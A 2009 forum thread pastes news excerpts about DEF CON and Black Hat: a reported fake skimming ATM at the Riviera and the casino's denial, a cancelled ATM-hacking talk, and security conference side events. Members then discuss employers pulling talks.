DEF CON in the news

Yikes!

Malicious ATM Catches Hackers

http://www.wired.com/threatlevel/200...tches-hackers/

There's a photo of the offending ATM on the linked page.

Gaming execs: Despite reports, hackers didn’t touch ATMs

By Steve Green
Wednesday, Aug. 5, 2009 | 6:58 p.m.

Gaming executives Wednesday disputed reports that hackers in town for the annual DEFCON conference over the weekend perpetrated frauds involving casino ATM machines.

Some broadcast and Internet reports said scammers had wheeled a fake ATM machine into the Riviera hotel-casino on the Las Vegas Strip with the goal of having people try to use it so the scammers could capture their card and PIN numbers.

That didn't happen, the Riviera said Wednesday.

In fact, the ATM in question in the hotel's convention lobby is owned by the hotel-casino and was deactivated as a security precaution while DEFCON was in town.

One Internet headline proclaimed: "Hacker exposes hacked Las Vegas ATM at DEFCON"

But it appears the Riviera and its security staff may have outsmarted the hackers by simply turning off the machine.

"Although it has been reported as an ATM machine purposely placed in the Riviera’s convention lobby by some unknown hacker to capture data on others that attempt to use it during DEFCON, the truth is, the Riviera-owned-and-operated ATM was turned off and the cash was removed as a precaution in preparation for the conference," Robert Vannucci, president of the Riviera, said in a statement.

Suggestions that hackers tampered with an ATM at the Rio hotel-casino also turned out to be untrue, said officials with Global Cash Access Inc. of Las Vegas, which operates ATMs at casinos around the country.

After hearing reports about problems with an ATM at the RIO, GCA's technology chief was sent to investigate Tuesday and found nothing wrong with the machines there, said Scott Dowty, GCA executive vice president of business development.

He said there have been recent problems at casinos in Las Vegas and elsewhere known as "cash dispense errors" when customers try to obtain cash and their accounts are charged, but the machines don't dispense the cash. These problems are associated with a recent change in technology platforms involving certain machines -- but not those at the Rio, Dowty said.

He said customers who don't receive money because of machine errors should call GCA customer service at 800 644-0439.

Yikes!

Malicious ATM Catches Hackers

http://www.wired.com/threatlevel/200...tches-hackers/

There's a photo of the offending ATM on the linked page.

* By Kim Zetter | August 2, 2009 | 4:32 pm | Categories: ATM Hacking, DefCon *

LAS VEGAS — There’s no honor among thieves, nor apparently among hackers.

A malicious ATM kiosk was positioned in the conference center of the Riviera Hotel Casino capturing data from an unknown number of hackers attending the DefCon hacker conference before someone noticed something suspicious about the kiosk.

An organizer for the conference said security authorities seized the device. It’s not known how long the ATM was in the hotel or whether it was placed there by a DefCon attendee to catch his fellow hackers or simply by an outside criminal group trying to target conference attendees.

Witnesses say the kiosk was well-placed to avoid surveillance cameras.

“In any casino anything that is considered that high value has a camera,” said Brian Markus, CEO of Aries Security who saw the machine, “and they placed it where there were no [hotel] cameras visibly watching that exact spot where the ATM was.”

Markus said it was clear to him the ATM was fake when he looked at the smoked glass on the front of the machine and noticed something funny about it. When he beamed a flashlight through the glass, instead of seeing a camera behind it, he saw the PC that was set up to siphon card data.

The ATM had been placed right outside the hotel’s security office.

...
"One good thing about the [economic] downturn is that the Riviera Hotel has been easier to deal with," said Moss, who was recently named to the Homeland Security Advisory Council. "They're letting us have access to the pool, so we'll have pool parties, and they've allowed us to do more social things that we wanted to do."
...
Juniper Networks pulled a talk one of its researchers was set to give about a flaw in ATM software after the ATM vendor complained. In his presentation entitled "Jackpotting Automated Teller Machines," Barnaby Jack was planning to provide a live demonstration of an attack on an automated teller machine.

"I'm disappointed Barnaby Jack's talk was canceled," said Moss. Another speaker this year was "forced or encouraged" not to release a tool, Moss said, but he couldn't remember which speaker or talk it was.
...

During their presentation at the Black Hat and Defcon hacker conferences next week in Las Vegas, security experts will release a tool that can be used to break into Oracle databases.

Chris Gates and Mario Ceballos will present Oracle Pentesting Methodology and give out "all the tools to break the 'unbreakable' Oracle as Metasploit auxiliary modules," according to a summary of their presentation on the Defcon Web site.
...

Security BSides will coincide with the popular Black Hat and Defcon ... It is a free, two-day event made up of 65 attendees (so far), 15 presenters, and six organizers.
...
According to the organizers:
"A number of quality speakers were rejected, not due to lack of quality but lack of space and time." .... "Our goal is to provide people with options by removing those barriers and providing more options of speakers, topics, and events."

I hope to bring you original interviews and information on the latest research, illuminating the stories behind the data. In many ways, this will be a reporter's notebook ....
For the next few week, I plan to peer into the research that will be presented next week in Las Vegas at the Black Hat Conference and the following DEFCON hacking conference.

The decision over whether to do that or wait until next month's Patch Tuesday may hinge upon whether attackers begin exploiting these other vulnerable areas by using Microsoft's patch (and Flake's research) as a guide to locating the flaws. What's more, this bug is almost certain to be discussed at Black Hat and Defcon, the world's largest annual security conferences, being held next week in Las Vegas.

Lt. Col. Robin Williams, aka “Montana,” of the 57th Information Aggressor Squadron does not rebuff comparisons of the 1980s movie “WarGames” and his team at Nellis.
...
The Information Aggressors supplement their knowledge of such threats by staying in contact with the usual alphabet soup government agencies — FBI, CIA and NSA — and also anti-virus and firewall companies such as Norton and Symantec. There are also field trips to Black Hat Briefings and the DEFCON hacker conventions.

Most of the security action happening later this month will be in Vegas' Caesars Palace and the Riviera Hotel, where Black Hat USA and Defcon will convene.
...
SecurityBSides was created as an alternative venue for research talks that were either rejected by Black Hat or just not submitted. It's a free, participant-driven, informal get-together where security researchers will share their thoughts -- and bring their own beer.
...
It's not a protest or direct competitor to Black Hat, he [Jack Daniel] says
[more]

“This is not something you can change overnight, but it had to start somewhere,” said Jeff Moss, founder of the Black Hat and DEFCON conferences. He said that securing the nation's infrastructure will be a daunting task because the government is using a lot of old technology that works, but isn't secure.

I have had this happen to me. My employer signed off on a presentation I was going to do at the first ShmooCon and then about a month before the Con they changed their mind, whipped out my NDA and told me I couldn't do it.

And I have to disagree with pulling a Michael Lynn. I think quitting your job is about a retarded reaction, especially if you do have an NDA in place that would allow your (former) employer to sue your ass off.

still... i wish there was some sort requirement when you submit a talk that you either (a) have full permission from your employer to present or (b) agree that you'll quit your job and pull a Michael Lynn and give the talk anyway.

fucking lame. that was one i was really looking forward to, even if it was going to possibly be more hype and little delivery. (with a title like that, content is suspect)

still... i wish there was some sort requirement when you submit a talk that you either (a) have full permission from your employer to present or (b) agree that you'll quit your job and pull a Michael Lynn and give the talk anyway.

Full Disclosure - i am not personally acquainted with the fellow in question and for all i know he could be a decent guy. still... just seems like a douchey situation all around.

Anyone have the inside scoop on what talk is replacing this?